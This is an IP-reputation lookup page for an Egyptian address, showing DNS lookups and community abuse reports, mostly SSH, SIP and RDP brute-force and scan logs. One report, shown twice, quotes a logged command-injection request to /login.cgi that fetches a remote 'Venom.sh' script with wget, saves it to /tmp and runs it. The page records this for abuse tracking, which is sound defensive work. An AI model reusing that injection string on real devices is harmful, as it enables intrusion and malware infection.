156.213.122.53

Basic Info

City: unknown

Region: unknown

Country: Egypt

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:

Make a comment on this IP

No discussion about this IP yet. Click above link to make one.

Comments on same subnet:

IP	Type	Details	Datetime
156.213.122.136	attackspambots	1 attack on wget probes like: 156.213.122.136 - - [22/Dec/2019:22:27:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 17:01:50

Type

Details

Datetime

156.213.122.136

attackspambots

1 attack on wget probes like:
156.213.122.136 - - [22/Dec/2019:22:27:30 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11

2019-12-23 17:01:50

Whois info:

Dig info:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 156.213.122.53
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 26085
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;156.213.122.53.			IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025020500 1800 900 604800 86400

;; Query time: 14 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Feb 05 17:02:32 CST 2025
;; MSG SIZE  rcvd: 107

Host info

53.122.213.156.in-addr.arpa domain name pointer host-156.213.53.122-static.tedata.net.

Nslookup info:

Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
53.122.213.156.in-addr.arpa	name = host-156.213.53.122-static.tedata.net.

Authoritative answers can be found from:

Related IP info:

Related comments:

IP	Type	Details	Datetime
114.67.236.25	attackbotsspam	Nov 5 08:06:41 web1 sshd\[15736\]: Invalid user philip from 114.67.236.25 Nov 5 08:06:41 web1 sshd\[15736\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.236.25 Nov 5 08:06:43 web1 sshd\[15736\]: Failed password for invalid user philip from 114.67.236.25 port 35598 ssh2 Nov 5 08:10:57 web1 sshd\[16165\]: Invalid user abhiabhi from 114.67.236.25 Nov 5 08:10:57 web1 sshd\[16165\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=114.67.236.25	2019-11-06 02:47:50
52.45.122.68	attackspambots	RDP Bruteforce	2019-11-06 02:25:47
80.211.251.54	attack	\[2019-11-05 13:19:59\] NOTICE\[2601\] chan_sip.c: Registration from '\' failed for '80.211.251.54:54079' - Wrong password \[2019-11-05 13:19:59\] SECURITY\[2634\] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-11-05T13:19:59.119-0500",Severity="Error",Service="SIP",EventVersion="2",AccountID="733",SessionID="0x7fdf2c003608",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/80.211.251.54/54079",Challenge="0b926fc0",ReceivedChallenge="0b926fc0",ReceivedHash="9c917a53c6b05580b41a50e923885fbd" \[2019-11-05 13:20:05\] NOTICE\[2601\] chan_sip.c: Registration from '\' failed for '80.211.251.54:64705' - Wrong password \[2019-11-05 13:20:05\] SECURITY\[2634\] res_security_log.c: SecurityEvent="InvalidPassword",EventTV="2019-11-05T13:20:05.249-0500",Severity="Error",Service="SIP",EventVersion="2",AccountID="44",SessionID="0x7fdf2c4c1948",LocalAddress="IPV4/UDP/192.168.244.6/5060",RemoteAddress="IPV4/UDP/80.211.251.54/6	2019-11-06 02:35:19
27.64.96.178	attackbots	SSH Brute-Force reported by Fail2Ban	2019-11-06 02:28:28
51.68.120.183	attackbotsspam	Web Attack: Masscan Scanner Request	2019-11-06 02:26:53
65.55.210.73	attackspam	WEB_SERVER 403 Forbidden	2019-11-06 02:56:01
114.67.105.24	attackspambots	WEB_SERVER 403 Forbidden	2019-11-06 02:36:31
94.191.119.176	attack	Nov 5 07:50:29 hanapaa sshd\[11911\]: Invalid user dolph from 94.191.119.176 Nov 5 07:50:29 hanapaa sshd\[11911\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.191.119.176 Nov 5 07:50:31 hanapaa sshd\[11911\]: Failed password for invalid user dolph from 94.191.119.176 port 60466 ssh2 Nov 5 07:56:37 hanapaa sshd\[12362\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=94.191.119.176 user=root Nov 5 07:56:40 hanapaa sshd\[12362\]: Failed password for root from 94.191.119.176 port 50543 ssh2	2019-11-06 02:48:33
89.248.174.215	attack	11/05/2019-12:07:08.501771 89.248.174.215 Protocol: 6 ET CINS Active Threat Intelligence Poor Reputation IP group 98	2019-11-06 02:39:41
78.169.142.188	attackspam	IP Ban Report : https://help-dysk.pl/wordpress-firewall-plugins/ip/78.169.142.188/ TR - 1H : (74) Protection Against DDoS WordPress plugin : "odzyskiwanie danych help-dysk" IP Address Ranges by Country : TR NAME ASN : ASN9121 IP : 78.169.142.188 CIDR : 78.169.140.0/22 PREFIX COUNT : 4577 UNIQUE IP COUNT : 6868736 ATTACKS DETECTED ASN9121 : 1H - 2 3H - 6 6H - 15 12H - 27 24H - 51 DateTime : 2019-11-05 15:35:57 INFO : Port Scan TELNET Detected and Blocked by ADMIN - data recovery	2019-11-06 02:38:55
188.166.54.199	attackspambots	Nov 5 18:12:54 SilenceServices sshd[24389]: Failed password for root from 188.166.54.199 port 34456 ssh2 Nov 5 18:17:05 SilenceServices sshd[27121]: Failed password for root from 188.166.54.199 port 53476 ssh2	2019-11-06 02:22:20
220.130.190.13	attack	Nov 5 17:48:24 ns381471 sshd[8605]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=220.130.190.13 Nov 5 17:48:26 ns381471 sshd[8605]: Failed password for invalid user Isaac2017 from 220.130.190.13 port 30696 ssh2	2019-11-06 02:18:41
83.175.213.250	attack	ssh failed login	2019-11-06 02:46:13
46.229.168.150	attack	WEB_SERVER 403 Forbidden	2019-11-06 02:40:48
77.42.114.37	attack	Automatic report - Port Scan Attack	2019-11-06 02:58:50

Recently Reported IPs

25.7.209.90	78.247.37.87	126.48.158.153	7.181.150.22
205.205.128.31	167.28.33.71	71.170.254.77	138.61.63.140
146.223.196.222	91.83.44.117	8.200.13.64	246.75.187.137
228.253.204.127	52.175.214.64	20.209.17.212	124.125.191.130
37.6.74.235	75.64.149.252	22.166.72.178	71.230.131.138